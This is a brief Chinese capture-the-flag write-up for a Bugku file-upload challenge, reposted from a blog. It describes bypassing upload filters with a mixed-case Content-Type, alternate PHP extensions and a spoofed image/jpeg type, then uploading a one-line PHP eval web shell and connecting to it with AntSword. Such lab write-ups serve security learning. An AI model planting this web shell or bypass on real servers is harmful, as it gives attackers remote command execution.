0


bugku-web-文件上传

题目没有太多的描述 简单明了

(它不想要PHP文件) 上传一个其他类型试试看

被拦截了

回想之前我们做过的题目 不可以上传 php文件 说明一共存在三个过滤

  • 请求头部的 Content-Type
  • 文件后缀
  • 请求数据的Content-Type

开始抓包咯

原始数据包 下面我们开始改包

上传的文件可以为任意文件,内容也可以是任意的,内容也可以为空

请求头部的 Content-Type 内容 随便改个大写字母过滤掉 比如 mulTipart/form-data
 所上传的文件后缀 改为 .php4(依次尝试php4,phtml,phtm,phps,php5(包括一些字母改变大小写))
 请求数据的Content-Type 内容改为 image/jpeg

顺便在包中加入一句话代码 (<script language=php>eval($_POST['cmd']);</script>)

上传成功

使用蚁剑进行连接

找到flag

标签: php 开发语言 安全

本文转载自: https://blog.csdn.net/m0_57954651/article/details/127652270
版权归原作者 :Carmelo Anthony 所有, 如有侵权,请联系我们删除。

“bugku-web-文件上传”的评论:

还没有评论